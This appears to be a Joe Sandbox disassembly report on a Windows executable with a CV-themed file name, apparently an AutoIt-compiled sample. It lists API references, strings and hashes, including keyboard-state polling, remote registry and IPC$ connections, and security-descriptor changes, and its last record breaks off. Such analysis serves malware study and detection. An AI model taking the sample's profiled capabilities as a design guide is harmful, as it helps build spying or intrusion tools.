                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 3840717409-0
                                                                                            • Opcode ID: ea63243b6a240fbbeb8d8a8c9982a47cc5f232a5a23cc2a93d304c5f467177dc
                                                                                            • Instruction ID: 33c8d54d1d8e595ddb413bba2fab36c795439f548cb0c90cf5222ed9232fb77c
                                                                                            • Opcode Fuzzy Hash: ea63243b6a240fbbeb8d8a8c9982a47cc5f232a5a23cc2a93d304c5f467177dc
                                                                                            • Instruction Fuzzy Hash: 83413879600214FFDB119F65EC88EAA7BB8FF8AB15F108058F906D7260D771AD81DB60
                                                                                            APIs
                                                                                            • __wsplitpath.LIBCMT ref: 0011076F
                                                                                            • _wcscat.LIBCMT ref: 00110787
                                                                                            • _wcscat.LIBCMT ref: 00110799
                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001107AE
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 001107C2
                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 001107DA
                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 001107F4
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00110806
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                            • String ID: *.*
                                                                                            • API String ID: 34673085-438819550
                                                                                            • Opcode ID: b74a22be78553c1beb8e3c5484567c334c0843354640c8db2bfea3bc2586726b
                                                                                            • Instruction ID: 1edc51c50fed59cdd2aaf27584364faefba249e09ec229bb45fa2a5d14fdab36
                                                                                            • Opcode Fuzzy Hash: b74a22be78553c1beb8e3c5484567c334c0843354640c8db2bfea3bc2586726b
                                                                                            • Instruction Fuzzy Hash: 18816D719043419FCB29DF24C8459AEB3E8AB99304F14883EF889D7251EBB0DDD4CB92
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0012EF3B
                                                                                            • GetFocus.USER32 ref: 0012EF4B
                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 0012EF56
                                                                                            • _memset.LIBCMT ref: 0012F081
                                                                                            • GetMenuItemInfoW.USER32 ref: 0012F0AC
                                                                                            • GetMenuItemCount.USER32(00000000), ref: 0012F0CC
                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 0012F0DF
                                                                                            • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0012F113
                                                                                            • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0012F15B
                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0012F193
                                                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0012F1C8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Similarity
                                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                            • String ID: 0
                                                                                            • API String ID: 1296962147-4108050209
                                                                                            APIs
                                                                                              • Part of subcall function 000FABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000FABD7
                                                                                              • Part of subcall function 000FABBB: GetLastError.KERNEL32(?,000FA69F,?,?,?), ref: 000FABE1
                                                                                              • Part of subcall function 000FABBB: GetProcessHeap.KERNEL32(00000008,?,?,000FA69F,?,?,?), ref: 000FABF0
                                                                                              • Part of subcall function 000FABBB: HeapAlloc.KERNEL32(00000000,?,000FA69F,?,?,?), ref: 000FABF7
                                                                                              • Part of subcall function 000FABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000FAC0E
                                                                                              • Part of subcall function 000FAC56: GetProcessHeap.KERNEL32(00000008,000FA6B5,00000000,00000000,?,000FA6B5,?), ref: 000FAC62
                                                                                              • Part of subcall function 000FAC56: HeapAlloc.KERNEL32(00000000,?,000FA6B5,?), ref: 000FAC69
                                                                                              • Part of subcall function 000FAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000FA6B5,?), ref: 000FAC7A
                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000FA8CB
                                                                                            • _memset.LIBCMT ref: 000FA8E0
                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000FA8FF
                                                                                            • GetLengthSid.ADVAPI32(?), ref: 000FA910
                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 000FA94D
                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000FA969
                                                                                            • GetLengthSid.ADVAPI32(?), ref: 000FA986
                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000FA995
                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 000FA99C
                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000FA9BD
                                                                                            • CopySid.ADVAPI32(00000000), ref: 000FA9C4
                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000FA9F5
                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000FAA1B
                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000FAA2F
                                                                                            Similarity
                                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                            • String ID:
                                                                                            • API String ID: 3996160137-0
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: LoadString__swprintf_wprintf
                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                            • API String ID: 2889450990-2391861430
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: LoadString__swprintf_wprintf
                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                            • API String ID: 2889450990-3420473620
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 001055D7
                                                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00105664
                                                                                            • GetMenuItemCount.USER32(00181708), ref: 001056ED
                                                                                            • DeleteMenu.USER32(00181708,00000005,00000000,000000F5,?,?), ref: 0010577D
                                                                                            • DeleteMenu.USER32(00181708,00000004,00000000), ref: 00105785
                                                                                            • DeleteMenu.USER32(00181708,00000006,00000000), ref: 0010578D
                                                                                            • DeleteMenu.USER32(00181708,00000003,00000000), ref: 00105795
                                                                                            • GetMenuItemCount.USER32(00181708), ref: 0010579D
                                                                                            • SetMenuItemInfoW.USER32(00181708,00000004,00000000,00000030), ref: 001057D3
                                                                                            • GetCursorPos.USER32(?), ref: 001057DD
                                                                                            • SetForegroundWindow.USER32(00000000), ref: 001057E6
                                                                                            • TrackPopupMenuEx.USER32(00181708,00000000,?,00000000,00000000,00000000), ref: 001057F9
                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00105805
                                                                                            Similarity
                                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                            • String ID:
                                                                                            • API String ID: 3993528054-0
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 000FA1DC
                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000FA211
                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000FA22D
                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000FA249
                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 000FA273
                                                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 000FA29B
                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000FA2A6
                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000FA2AB
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                            • API String ID: 1687751970-22481851
                                                                                            APIs
                                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00122BB5,?,?), ref: 00123C1D
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: BuffCharUpper
                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                            • API String ID: 3964851224-909552448
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001336F4,00000010,?,Bad directive syntax error,0015DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 001025D6
                                                                                            • LoadStringW.USER32(00000000,?,001336F4,00000010), ref: 001025DD
                                                                                            • _wprintf.LIBCMT ref: 00102610
                                                                                            • __swprintf.LIBCMT ref: 00102632
                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 001026A1
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                            • API String ID: 1080873982-4153970271
                                                                                            • Opcode ID: 5fa4f8f56483d3647c59753cecc7cbd49cf810108a93dcb496350b8126071808
                                                                                            • Instruction ID: 83c0c04df434f95c796dafca518dd134503609afb5d4839d41a26083239b3fcb
                                                                                            • Opcode Fuzzy Hash: 5fa4f8f56483d3647c59753cecc7cbd49cf810108a93dcb496350b8126071808
                                                                                            • Instruction Fuzzy Hash: 35216B3180021ABFDF11AF90CC4AFEE7B79BF19304F044459F919660A3EB71AA58DB51
                                                                                            APIs
                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00107B42
                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00107B58
                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00107B69
                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00107B7B
                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00107B8C
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: SendString
                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                            • API String ID: 890592661-1007645807
                                                                                            • Opcode ID: 1082c9e6a96dff058ea6afc65a9770a373feddc440166ca7905301c3116505a2
                                                                                            • Instruction ID: 569fb6808b4c2c7f6428dec1f21bc2a3e45d45e503c1b7a7bf6bce5fd1fcd6dc
                                                                                            • Opcode Fuzzy Hash: 1082c9e6a96dff058ea6afc65a9770a373feddc440166ca7905301c3116505a2
                                                                                            • Instruction Fuzzy Hash: ED11C4B1A5026979D724B3A1CC4AEFF7A7CEB91B00F00051DB425A20D2EFA05A45C5B0
                                                                                            APIs
                                                                                            • timeGetTime.WINMM ref: 00107794
                                                                                              • Part of subcall function 000DDC38: timeGetTime.WINMM(?,75A8B400,001358AB), ref: 000DDC3C
                                                                                            • Sleep.KERNEL32(0000000A), ref: 001077C0
                                                                                            • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 001077E4
                                                                                            • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00107806
                                                                                            • SetActiveWindow.USER32 ref: 00107825
                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00107833
                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00107852
                                                                                            • Sleep.KERNEL32(000000FA), ref: 0010785D
                                                                                            • IsWindow.USER32 ref: 00107869
                                                                                            • EndDialog.USER32(00000000), ref: 0010787A
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                            • String ID: BUTTON
                                                                                            • API String ID: 1194449130-3405671355
                                                                                            • Opcode ID: 4d24fb3dbc7ae2ba3d53db71ffd74068396d596e55626a5f0854f98b38a24d66
                                                                                            • Instruction ID: 82834fc20d17442932ec9bd5cc7a52e6c3eea6a8ed4cb5ecf38a719598b7478b
                                                                                            • Opcode Fuzzy Hash: 4d24fb3dbc7ae2ba3d53db71ffd74068396d596e55626a5f0854f98b38a24d66
                                                                                            • Instruction Fuzzy Hash: AC219374604205AFEB115B60FC9DB267F3AFB45B88F094015F955829F2DFB16E84DB20
                                                                                            APIs
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            • CoInitialize.OLE32(00000000), ref: 0011034B
                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001103DE
                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 001103F2
                                                                                            • CoCreateInstance.OLE32(0014DA8C,00000000,00000001,00173CF8,?), ref: 0011043E
                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001104AD
                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00110505
                                                                                            • _memset.LIBCMT ref: 00110542
                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0011057E
                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001105A1
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 001105A8
                                                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 001105DF
                                                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 001105E1
                                                                                            Similarity
                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                            • String ID:
                                                                                            • API String ID: 1246142700-0
                                                                                            • Opcode ID: 27c8da72c39a0fc4366ba2265e177978f1cca5f593cbcd968e6b4b09f6f1bd89
                                                                                            • Instruction ID: ee8637ab5909ba3a2c1e0d4fcc7771b584df58c40e3e06395af7002f5ca760e8
                                                                                            • Opcode Fuzzy Hash: 27c8da72c39a0fc4366ba2265e177978f1cca5f593cbcd968e6b4b09f6f1bd89
                                                                                            • Instruction Fuzzy Hash: 8AB1DA75A00209AFDB05DFA4D889DAEBBB9FF48304B148469F905EB261DB70ED81CF50
                                                                                            APIs
                                                                                            • GetKeyboardState.USER32(?), ref: 00102ED6
                                                                                            • SetKeyboardState.USER32(?), ref: 00102F41
                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00102F61
                                                                                            • GetKeyState.USER32(000000A0), ref: 00102F78
                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00102FA7
                                                                                            • GetKeyState.USER32(000000A1), ref: 00102FB8
                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00102FE4
                                                                                            • GetKeyState.USER32(00000011), ref: 00102FF2
                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 0010301B
                                                                                            • GetKeyState.USER32(00000012), ref: 00103029
                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00103052
                                                                                            • GetKeyState.USER32(0000005B), ref: 00103060
                                                                                            Similarity
                                                                                            • API ID: State$Async$Keyboard
                                                                                            • String ID:
                                                                                            • API String ID: 541375521-0
                                                                                            • Opcode ID: 2f270b47564f6cbdadfd9a8a8e63a8deb9769807b0620d60d3631ea9b74f1535
                                                                                            • Instruction ID: 9cd48eedb48a1fdcd26f25f079c916adde8be027d846a1e26b25e0b4a3c92c94
                                                                                            • Opcode Fuzzy Hash: 2f270b47564f6cbdadfd9a8a8e63a8deb9769807b0620d60d3631ea9b74f1535
                                                                                            • Instruction Fuzzy Hash: 0B51D974A0478829FB35EBA488547EABFF85F11380F08859DD5C25B1C2DBE4AB8CC761
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 000FED1E
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 000FED30
                                                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 000FED8E
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 000FED99
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 000FEDAB
                                                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 000FEE01
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 000FEE0F
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 000FEE20
                                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 000FEE63
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 000FEE71
                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 000FEE8E
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 000FEE9B
                                                                                            Similarity
                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                            • String ID:
                                                                                            • API String ID: 3096461208-0
                                                                                            • Opcode ID: ca7fc49e45311455b0297ae045f51a199c353491ce7f6cc2d555f2a922232511
                                                                                            • Instruction ID: 4dba7d9539884c126452b5fbff23bb9a251d7e7f762336b4098c729b8aab6f32
                                                                                            • Opcode Fuzzy Hash: ca7fc49e45311455b0297ae045f51a199c353491ce7f6cc2d555f2a922232511
                                                                                            • Instruction Fuzzy Hash: 2D5122B5B00209AFDF18CF68DD85AAEBBB6EB88710F158129F619D76A0D7709D40CB10
                                                                                            APIs
                                                                                              • Part of subcall function 000DB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000DB759,?,00000000,?,?,?,?,000DB72B,00000000,?), ref: 000DBA58
                                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,000DB72B), ref: 000DB7F6
                                                                                            • KillTimer.USER32(00000000,?,00000000,?,?,?,?,000DB72B,00000000,?,?,000DB2EF,?,?), ref: 000DB88D
                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0013D8A6
                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000DB72B,00000000,?,?,000DB2EF,?,?), ref: 0013D8D7
                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000DB72B,00000000,?,?,000DB2EF,?,?), ref: 0013D8EE
                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000DB72B,00000000,?,?,000DB2EF,?,?), ref: 0013D90A
                                                                                            • DeleteObject.GDI32(00000000), ref: 0013D91C
                                                                                            Similarity
                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                            • String ID:
                                                                                            • API String ID: 641708696-0
                                                                                            • Opcode ID: 8e4aec361ef165a44dc998cc6df9454668be1c031da515f26831ec4e215a2c7a
                                                                                            • Instruction ID: a6a7e807fabc8e30e4ad259e7ca0c12001643e8b4c09c48ea5b86c221a2e8597
                                                                                            • Opcode Fuzzy Hash: 8e4aec361ef165a44dc998cc6df9454668be1c031da515f26831ec4e215a2c7a
                                                                                            • Instruction Fuzzy Hash: 0D616831500700EFDB359F18E988B69B7F9FF95316F26051AE48686A70DBB0A9C1DB60
                                                                                            APIs
                                                                                              • Part of subcall function 000DB526: GetWindowLongW.USER32(?,000000EB), ref: 000DB537
                                                                                            • GetSysColor.USER32(0000000F), ref: 000DB438
                                                                                            Similarity
                                                                                            • API ID: ColorLongWindow
                                                                                            • String ID:
                                                                                            • API String ID: 259745315-0
                                                                                            • Opcode ID: 417c6dbd28c8537fdd01813d09daa715f5556dac8fe42305063033bf52b8dd1a
                                                                                            • Instruction ID: 48a22916a5513c5ab20d8c8dae6fb12a4b535498d24b7774da8b1c3432eb7167
                                                                                            • Opcode Fuzzy Hash: 417c6dbd28c8537fdd01813d09daa715f5556dac8fe42305063033bf52b8dd1a
                                                                                            • Instruction Fuzzy Hash: 2241C335000240EFDF259F28E889BB93BA5AB06730F554262FD658E6E6D7308D81DB31
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                            • String ID:
                                                                                            • API String ID: 136442275-0
                                                                                            • Opcode ID: 5b2df767d03be660696161f2ecaf33a2ea2b45420823c8443f288cac79b1502d
                                                                                            • Instruction ID: 7c63a772a4dc20ac7e67701f3d3f5298c1da00e4db002116c082d43b3345ed65
                                                                                            • Opcode Fuzzy Hash: 5b2df767d03be660696161f2ecaf33a2ea2b45420823c8443f288cac79b1502d
                                                                                            • Instruction Fuzzy Hash: 58413B7694515CAECF61EB90CC45DCB73BDEB44300F1041A2B699B2092EBB0ABE98F50
                                                                                            APIs
                                                                                            • CharLowerBuffW.USER32(0015DC00,0015DC00,0015DC00), ref: 0010D7CE
                                                                                            • GetDriveTypeW.KERNEL32(?,00173A70,00000061), ref: 0010D898
                                                                                            • _wcscpy.LIBCMT ref: 0010D8C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                            • API String ID: 2820617543-1000479233
                                                                                            • Opcode ID: a56d83b3680bc9f1aa9cb6f2624b18f63fa6a2fbf19cef60975f4972d37fd6f1
                                                                                            • Instruction ID: be2c6f245a5025f4299cb4a1d5156638c5b0771e79e5ebf7c7ae12d5f4b79065
                                                                                            • Opcode Fuzzy Hash: a56d83b3680bc9f1aa9cb6f2624b18f63fa6a2fbf19cef60975f4972d37fd6f1
                                                                                            • Instruction Fuzzy Hash: 09519135104340AFC704EF54E892AAEB7A5EF94314F50C82EF5EA5B2E2EB71DD05CA52
                                                                                            APIs
                                                                                            • __swprintf.LIBCMT ref: 000C93AB
                                                                                            • __itow.LIBCMT ref: 000C93DF
                                                                                              • Part of subcall function 000E1557: _xtow@16.LIBCMT ref: 000E1578
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __itow__swprintf_xtow@16
                                                                                            • String ID: %.15g$0x%p$False$True
                                                                                            • API String ID: 1502193981-2263619337
                                                                                            • Opcode ID: 5e5b25d3fbc032e4571bb93fc4be19aac3177eb9e56c801bd6c0385bdeb6c51c
                                                                                            • Instruction ID: 9c6472435688d7d3580c105af19267fa28b7c16fcc41cd0ecb3bf6a4324fc9ca
                                                                                            • Opcode Fuzzy Hash: 5e5b25d3fbc032e4571bb93fc4be19aac3177eb9e56c801bd6c0385bdeb6c51c
                                                                                            • Instruction Fuzzy Hash: 5041B072504205EFEB24DB64D946FAEB7F8EB48300F24446EE14AD72D2EB31AA41DB10
                                                                                            APIs
                                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0012A259
                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0012A260
                                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0012A273
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0012A27B
                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0012A286
                                                                                            • DeleteDC.GDI32(00000000), ref: 0012A28F
                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0012A299
                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0012A2AD
                                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0012A2B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                            • String ID: static
                                                                                            • API String ID: 2559357485-2160076837
                                                                                            • Opcode ID: a9edc88e6e8b46ac9d33131a0c3564a2d68ee733e69f25bead6a35434bc9e8e4
                                                                                            • Instruction ID: 568697cc56d015611109641e51c524c91747268e52d723396ac758f3956b936a
                                                                                            • Opcode Fuzzy Hash: a9edc88e6e8b46ac9d33131a0c3564a2d68ee733e69f25bead6a35434bc9e8e4
                                                                                            • Instruction Fuzzy Hash: F0319C35100224FBDF219FA4EC49FEA3B69FF1E760F110215FA19A60A0D731D861DBA5
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
